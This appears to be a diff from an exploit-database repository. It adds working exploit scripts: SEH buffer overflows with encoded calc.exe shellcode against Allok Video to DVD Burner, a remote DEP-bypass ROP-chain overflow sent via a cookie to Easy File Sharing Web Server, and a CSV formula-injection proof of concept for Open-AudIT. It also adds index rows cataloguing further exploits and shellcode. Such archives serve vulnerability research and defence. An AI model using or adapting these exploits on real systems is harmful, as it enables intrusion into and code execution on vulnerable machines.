calc = ("\x89\xe1\xd9\xf7\xd9\x71\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x59\x6c\x5a\x48\x4c\x42\x77\x70\x53\x30\x45\x50\x35\x30\x6b"
"\x39\x58\x65\x70\x31\x39\x50\x30\x64\x4c\x4b\x50\x50\x64\x70"
"\x6e\x6b\x71\x42\x34\x4c\x4e\x6b\x71\x42\x37\x64\x6e\x6b\x62"
"\x52\x56\x48\x36\x6f\x4c\x77\x61\x5a\x64\x66\x56\x51\x49\x6f"
"\x6e\x4c\x45\x6c\x75\x31\x71\x6c\x53\x32\x66\x4c\x55\x70\x69"
"\x51\x38\x4f\x44\x4d\x47\x71\x6a\x67\x78\x62\x6a\x52\x31\x42"
"\x76\x37\x4e\x6b\x70\x52\x44\x50\x6e\x6b\x61\x5a\x47\x4c\x6c"
"\x4b\x30\x4c\x34\x51\x71\x68\x4b\x53\x63\x78\x77\x71\x4b\x61"
"\x63\x61\x4e\x6b\x63\x69\x35\x70\x56\x61\x4e\x33\x6e\x6b\x57"
"\x39\x65\x48\x68\x63\x44\x7a\x37\x39\x6c\x4b\x46\x54\x6c\x4b"
"\x47\x71\x7a\x76\x35\x61\x49\x6f\x4c\x6c\x7a\x61\x6a\x6f\x64"
"\x4d\x55\x51\x4b\x77\x57\x48\x6b\x50\x74\x35\x69\x66\x65\x53"
"\x31\x6d\x4a\x58\x77\x4b\x61\x6d\x51\x34\x61\x65\x6a\x44\x61"
"\x48\x4e\x6b\x62\x78\x45\x74\x47\x71\x79\x43\x71\x76\x4c\x4b"
"\x64\x4c\x72\x6b\x6c\x4b\x73\x68\x35\x4c\x43\x31\x6a\x73\x6e"
"\x6b\x37\x74\x6e\x6b\x37\x71\x4e\x30\x4f\x79\x52\x64\x35\x74"
"\x55\x74\x71\x4b\x51\x4b\x51\x71\x70\x59\x72\x7a\x53\x61\x6b"
"\x4f\x59\x70\x73\x6f\x63\x6f\x72\x7a\x4c\x4b\x56\x72\x48\x6b"
"\x6e\x6d\x31\x4d\x50\x6a\x55\x51\x6e\x6d\x4b\x35\x4f\x42\x73"
"\x30\x65\x50\x55\x50\x42\x70\x72\x48\x70\x31\x4e\x6b\x42\x4f"
"\x6c\x47\x6b\x4f\x4a\x75\x4d\x6b\x5a\x50\x48\x35\x6e\x42\x31"
"\x46\x62\x48\x39\x36\x5a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x79\x45"
"\x45\x6c\x63\x36\x73\x4c\x45\x5a\x6b\x30\x59\x6b\x79\x70\x50"
"\x75\x55\x55\x6d\x6b\x43\x77\x42\x33\x61\x62\x62\x4f\x33\x5a"
"\x33\x30\x56\x33\x49\x6f\x49\x45\x43\x53\x53\x51\x72\x4c\x53"
"\x53\x44\x6e\x65\x35\x64\x38\x43\x55\x67\x70\x41\x41")
fill = "D"*8000
buffer = junk + nseh + seh + calc + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

55
exploits/windows/local/44518.py Executable file
View file

@ -0,0 +1,55 @@
#######################################################
# Exploit Title: Buffer Overflow(SEH) on Allok Video to DVD Burner2.6.1217
# Date: 23.04.2018
# Exploit Author:T3jv1l
# Vendor Homepage:http://www.alloksoft.com/
# Software: www.alloksoft.com/allok_dvdburner.exe
# Category:Local
# Contact:https://twitter.com/T3jv1l
# Version: Allok Video to DVD Burner 2.6.1217
# Tested on: Windows 7 SP1 x86
# Hello subinacls !
# Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
#############################################################
print"""
#1. Download and install the setup file
#2. Run this exploit code via python 2.7
#3. A file "Evil.txt" will be created
#4. Copy the contents of the file (Evil.txt)and paste in the License Name field
#5. Click Register and BOMM !!!! """
import struct
file = open("Evil.txt","wb")
buffer = 4000
junk = "A" * 780
nseh = "\x90\x90\xeb\x10"
seh = struct.pack("<L",0x10019A09)
nop = "\x90" * 20
# Shellcode Calc.exe
buf = ""
buf +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
buf +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
buf +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
buf +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
buf +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
buf +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
buf +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
buf +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
buf +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
buf +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
buf +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
buf +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
buf +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
buf +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
buf +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
buf +="\xc4\xd9"
exploit = junk + nseh + seh + nop + buf
fillers = buffer - len(exploit)
crush = exploit + "T" * fillers
print "[+] Crush Me"
file.write(crush)
file.close()

192
exploits/windows/remote/44522.py Executable file
View file

@ -0,0 +1,192 @@
#!/usr/bin/env python
#---------------------------------------------------------------------------------------------------#
# Exploit Title : Easy File Sharing Web Server 7.2 - 'UserID' Remote Buffer Overflow (DEP Bypass) #
# Date : 04/24/2018 #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : http://www.sharing-file.com/ #
# Software Link : http://www.sharing-file.com/efssetup.exe #
# Original Exploit: https://www.exploit-db.com/exploits/44485/ #
# Tested on : Windows 7 Enterprise (x86) - Service Pack 1 #
#---------------------------------------------------------------------------------------------------#
import requests
import struct
import time
host='192.168.80.148'
port='80'
# badchars = "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"
# root@kali:~# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v shellcode -f python
# Payload size: 447 bytes
shellcode = ""
shellcode += "\x89\xe3\xd9\xe5\xd9\x73\xf4\x5a\x4a\x4a\x4a\x4a"
shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43"
shellcode += "\x43\x37\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41"
shellcode += "\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42"
shellcode += "\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
shellcode += "\x6c\x6b\x58\x4e\x62\x63\x30\x57\x70\x77\x70\x53"
shellcode += "\x50\x6e\x69\x6b\x55\x64\x71\x39\x50\x50\x64\x6e"
shellcode += "\x6b\x42\x70\x64\x70\x6c\x4b\x43\x62\x36\x6c\x6e"
shellcode += "\x6b\x43\x62\x75\x44\x6e\x6b\x52\x52\x64\x68\x46"
shellcode += "\x6f\x38\x37\x50\x4a\x76\x46\x64\x71\x4b\x4f\x4e"
shellcode += "\x4c\x77\x4c\x35\x31\x61\x6c\x77\x72\x76\x4c\x37"
shellcode += "\x50\x4a\x61\x5a\x6f\x74\x4d\x37\x71\x39\x57\x38"
shellcode += "\x62\x5a\x52\x30\x52\x66\x37\x6e\x6b\x50\x52\x62"
shellcode += "\x30\x6c\x4b\x62\x6a\x57\x4c\x6c\x4b\x52\x6c\x47"
shellcode += "\x61\x74\x38\x6d\x33\x71\x58\x43\x31\x38\x51\x50"
shellcode += "\x51\x6c\x4b\x33\x69\x67\x50\x35\x51\x48\x53\x6e"
shellcode += "\x6b\x57\x39\x75\x48\x69\x73\x54\x7a\x63\x79\x4e"
shellcode += "\x6b\x35\x64\x6c\x4b\x35\x51\x6a\x76\x46\x51\x39"
shellcode += "\x6f\x6e\x4c\x6f\x31\x48\x4f\x44\x4d\x36\x61\x48"
shellcode += "\x47\x34\x78\x6b\x50\x74\x35\x69\x66\x73\x33\x73"
shellcode += "\x4d\x49\x68\x55\x6b\x43\x4d\x47\x54\x74\x35\x68"
shellcode += "\x64\x63\x68\x4e\x6b\x46\x38\x66\x44\x33\x31\x59"
shellcode += "\x43\x61\x76\x6c\x4b\x66\x6c\x50\x4b\x4c\x4b\x50"
shellcode += "\x58\x47\x6c\x65\x51\x69\x43\x6c\x4b\x63\x34\x6e"
shellcode += "\x6b\x43\x31\x68\x50\x4e\x69\x61\x54\x65\x74\x65"
shellcode += "\x74\x51\x4b\x51\x4b\x73\x51\x73\x69\x62\x7a\x42"
shellcode += "\x71\x69\x6f\x39\x70\x51\x4f\x73\x6f\x43\x6a\x4e"
shellcode += "\x6b\x52\x32\x78\x6b\x4e\x6d\x31\x4d\x53\x5a\x67"
shellcode += "\x71\x6c\x4d\x4f\x75\x48\x32\x57\x70\x77\x70\x43"
shellcode += "\x30\x66\x30\x61\x78\x46\x51\x6e\x6b\x70\x6f\x6e"
shellcode += "\x67\x59\x6f\x6b\x65\x4f\x4b\x78\x70\x6d\x65\x39"
shellcode += "\x32\x50\x56\x73\x58\x6c\x66\x6c\x55\x4d\x6d\x6d"
shellcode += "\x4d\x49\x6f\x49\x45\x65\x6c\x45\x56\x73\x4c\x45"
shellcode += "\x5a\x6b\x30\x6b\x4b\x39\x70\x53\x45\x34\x45\x4d"
shellcode += "\x6b\x42\x67\x65\x43\x63\x42\x70\x6f\x50\x6a\x37"
shellcode += "\x70\x66\x33\x6b\x4f\x69\x45\x30\x63\x35\x31\x72"
shellcode += "\x4c\x65\x33\x76\x4e\x75\x35\x42\x58\x45\x35\x67"
shellcode += "\x70\x41\x41"
# 4059 bytes to nSEH offset [filler + ROP + shellcode + filler]
buffer = '\x41' * (2647-128) # filler to where ESP will point after stack pivot (see SEH gadget)
# mona.py VirtualProtect() ROP template with few modifications
# ESI = ptr to VirtualProtect()
buffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c832d0) # ptr to &VirtualProtect() [IAT sqlite3.dll]
buffer += struct.pack('<L', 0x1002248c) # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c18d81) # XCHG EAX,EDI # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x1001d626) # XOR ESI,ESI # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x10021a3e) # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
# EBP = ReturnTo (ptr to jmp esp)
buffer += struct.pack('<L', 0x1001add7) # POP EBP # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c24169) # & push esp # ret [sqlite3.dll]
# EDX = NewProtect (0x40)
buffer += struct.pack('<L', 0x10022c4c) # XOR EDX,EDX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
# ECX = lpOldProtect (ptr to W address)
buffer += struct.pack('<L', 0x1001b377) # POP ECX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c730ad) # &Writable location [sqlite3.dll]
# EBX = dwSize (0x00000501)
buffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0xfffffaff) # will become 0x00000501 after negate
buffer += struct.pack('<L', 0x100231d1) # NEG EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001da09) # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll]
buffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c730ad) # &Writable location [sqlite3.dll]
# EDI = ROP NOP (RETN)
buffer += struct.pack('<L', 0x10019f47) # POP EDI # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll]
# EAX = NOP (0x90909090)
buffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x90909090) # nop
buffer += struct.pack('<L', 0x100240c2) # PUSHAD # RETN [ImageLoad.dll]
buffer += "\x90" * 50 # nop
buffer += shellcode # calc.exe
buffer += "\x90" * 50 # nop
buffer += '\x45' * (1412-(4*88)+128-len(shellcode)-100)
buffer += '\x42' * 4 # nSEH filler
# stack pivot that will land somewhere in buffer of As
buffer += struct.pack('<L', 0x10022869) # SEH ADD ESP,1004 # RETN [ImageLoad.dll]
buffer += '\x44' * (5000-4059-4-4)
print "[+] Sending %s bytes of evil payload.." %len(buffer)
time.sleep(1)
try:
cookies = dict(SESSIONID='6771', UserID=buffer,PassWD='')
data=dict(frmLogin='',frmUserName='',frmUserPass='',login='')
requests.post('http://'+host+':'+port+'/forum.ghp',cookies=cookies,data=data)
except:
print "The server stopped responding. You should see calc.exe by now ;D"

50
exploits/windows/webapps/44511.txt Normal file
View file

@ -0,0 +1,50 @@
Hi Guys,
#######################################
# Exploit Title: Open-AudIT 2.1 - CSV Macro Injection Vulnerability
# Google Dork: N/A
# Date: 21-04-2018
#######################################
# Exploit Author: Sureshbabu Narvaneni#
#######################################
# Author Blog : http://nullnews.in
# Vendor Homepage: https://opmantek.com
# Software Link: https://www.open-audit.org/downloads.php
# Affected Version: 2.1
# Category: WebApps
# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
# CVE : CVE-2018-9137
#######################################
1. Vendor Description:
Open-AudIT intelligently scans an organizations network and stores the
configurations of the discovered devices.
A powerful reporting framework enables information such as software
licensing, configuration changes, non-authorized devices, capacity
utilization and hardware warranty status to be extracted and explored.
Open-AudIT Enterprise comes with additional features including Business
Dashboards, Report filtering, Scheduled discovery, Scheduled Reports and
Maps.
2. Technical Description:
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in
the export feature in the OpenAudIT before 2.2 via a value that is
mishandled in a CSV export.
3. Proof of Concept:
Login and Navigate to the any field which is having export feature and
create an entry with @SUM(1+1)*cmd|' /C calc'!A0.
When user logged in and exported user data then the CSV
Formula gets executed and calculator will get popped in his machine.
4. Solution:
Update to latest version
https://www.open-audit.org/downloads.php

22
files_exploits.csv
View file

@ -5942,6 +5942,15 @@ id,file,description,date,author,type,platform,port
44491,exploits/multiple/dos/44491.txt,"RSVG 2.40.13 / 2.42.2 - '.svg' Buffer Overflow",2018-04-18,Hamm3r.py,dos,multiple,
44494,exploits/windows/dos/44494.py,"VX Search 10.6.18 - 'directory' Local Buffer Overflow",2018-04-18,"Kevin McGuigan",dos,windows,
44500,exploits/windows_x86/dos/44500.py,"PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service)",2018-04-23,luriel,dos,windows_x86,
44519,exploits/linux/dos/44519.txt,"gif2apng 1.9 - '.gif' Stack Buffer Overflow",2018-04-24,Hamm3r.py,dos,linux,
44514,exploits/windows/dos/44514.py,"VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5 - Memory Corruption (PoC)",2018-04-24,SivertPL,dos,windows,
44521,exploits/linux/dos/44521.py,"Kaspersky KSN for Linux 5.2 - Memory Corruption",2018-04-24,"Juan Sacco",dos,linux,
44525,exploits/windows/dos/44525.py,"Microsoft (Win 10) Internet Explorer 11.371.16299.0 - Denial Of Service",2018-04-24,hyp3rlinx,dos,windows,
44526,exploits/multiple/dos/44526.txt,"Adobe Flash - Overflow when Playing Sound",2018-04-24,"Google Security Research",dos,multiple,
44527,exploits/multiple/dos/44527.txt,"Adobe Flash - Overflow in Slab Rendering",2018-04-24,"Google Security Research",dos,multiple,
44528,exploits/multiple/dos/44528.txt,"Adobe Flash - Info Leak in Image Inflation",2018-04-24,"Google Security Research",dos,multiple,
44529,exploits/multiple/dos/44529.txt,"Adobe Flash - Out-of-Bounds Write in blur Filtering",2018-04-24,"Google Security Research",dos,multiple,
44530,exploits/multiple/dos/44530.js,"Chrome V8 JIT - 'NodeProperties::InferReceiverMaps' Type Confusion",2018-04-24,"Google Security Research",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9667,6 +9676,9 @@ id,file,description,date,author,type,platform,port
44478,exploits/windows_x86/local/44478.cpp,"Microsoft Window Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation",2018-03-26,xiaodaozhi,local,windows_x86,
44479,exploits/windows_x86/local/44479.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS17-017)",2018-03-15,xiaodaozhi,local,windows_x86,
44480,exploits/windows_x86/local/44480.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS16-039)",2018-03-01,xiaodaozhi,local,windows_x86,
44516,exploits/windows/local/44516.py,"R 3.4.4 - Local Buffer Overflow",2018-04-24,bzyo,local,windows,
44518,exploits/windows/local/44518.py,"Allok Video to DVD Burner 2.6.1217 - Buffer Overflow (SEH)",2018-04-24,T3jv1l,local,windows,
44523,exploits/linux/local/44523.rb,"lastore-daemon D-Bus - Privilege Escalation (Metasploit)",2018-04-24,Metasploit,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16419,6 +16431,8 @@ id,file,description,date,author,type,platform,port
44473,exploits/hardware/remote/44473.txt,"D-Link DIR-615 Wireless Router - Persistent Cross Site Scripting",2018-04-17,"Sayan Chatterjee",remote,hardware,
44482,exploits/php/remote/44482.rb,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)",2018-04-17,"José Ignacio Rojo",remote,php,80
44485,exploits/windows/remote/44485.py,"Easy File Sharing Web Server 7.2 - Stack Buffer Overflow",2018-04-18,rebeyond,remote,windows,80
44522,exploits/windows/remote/44522.py,"Easy File Sharing Web Server 7.2 - 'UserID' Remote Buffer Overflow (DEP Bypass)",2018-04-24,"Hashim Jawad",remote,windows,
44524,exploits/hardware/remote/44524.rb,"ASUS infosvr - Auth Bypass Command Execution (Metasploit)",2018-04-24,Metasploit,remote,hardware,9999
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39194,3 +39208,11 @@ id,file,description,date,author,type,platform,port
44498,exploits/linux/webapps/44498.py,"Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation",2018-04-23,r4wd3r,webapps,linux,
44501,exploits/php/webapps/44501.txt,"Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure",2018-04-23,"Larry W. Cashdollar",webapps,php,
44502,exploits/php/webapps/44502.txt,"Monstra cms 3.0.4 - Persitent Cross-Site Scripting",2018-04-23,"Wenming Jiang",webapps,php,
44503,exploits/php/webapps/44503.txt,"UK Cookie Consent - Persistent Cross-Site Scripting",2018-04-24,B0UG,webapps,php,
44504,exploits/php/webapps/44504.txt,"WUZHI CMS 4.1.0 - Cross-Site Request Forgery",2018-04-24,jiguang,webapps,php,
44511,exploits/windows/webapps/44511.txt,"Open-AudIT 2.1 - CSV Macro Injection",2018-04-24,"Sureshbabu Narvaneni",webapps,windows,
44512,exploits/php/webapps/44512.txt,"Monstra CMS 3.0.4 - Arbitrary Folder Deletion",2018-04-24,"Wenming Jiang",webapps,php,
44513,exploits/php/webapps/44513.py,"Interspire Email Marketer < 6.1.6 - Remote Admin Authentication Bypass",2018-04-24,devcoinfet,webapps,php,
44515,exploits/php/webapps/44515.py,"Ericsson-LG iPECS NMS A.1Ac - Cleartext Credential Disclosure",2018-04-24,"Berk Cem Göksel",webapps,php,
44520,exploits/php/webapps/44520.html,"WordPress Plugin Woo Import Export 1.0 - Arbitrary File Deletion",2018-04-24,"Lenon Leite",webapps,php,80
44531,exploits/java/webapps/44531.txt,"WSO2 Carbon / WSO2 Dashboard Server 5.3.0 - Persistent Cross-Site Scripting",2018-04-24,"SEC Consult",webapps,java,

Can't render this file because it is too large.

6
files_shellcodes.csv
View file

@ -874,3 +874,9 @@ id,file,description,date,author,type,platform
44321,shellcodes/linux_x86/44321.c,"Linux/x86 - execve(/bin/sh) Shellcode (18 bytes)",2018-03-20,"Anurag Srivastava",shellcode,linux_x86
44334,shellcodes/linux_x86/44334.c,"Linux/x86 - EggHunter + Null-Free Shellcode (11 Bytes)",2018-03-23,"Anurag Srivastava",shellcode,linux_x86
44445,shellcodes/generator/44445.py,"Linux/x64 - x64 Assembly Shellcode (Generator)",2018-04-11,0x4ndr3,shellcode,generator
44505,shellcodes/linux_x86/44505.c,"Linux/x86 - Bind TCP (1337/TCP) Shell + Null-Free Shellcode (92 bytes)",2018-04-24,"Anurag Srivastava",shellcode,linux_x86
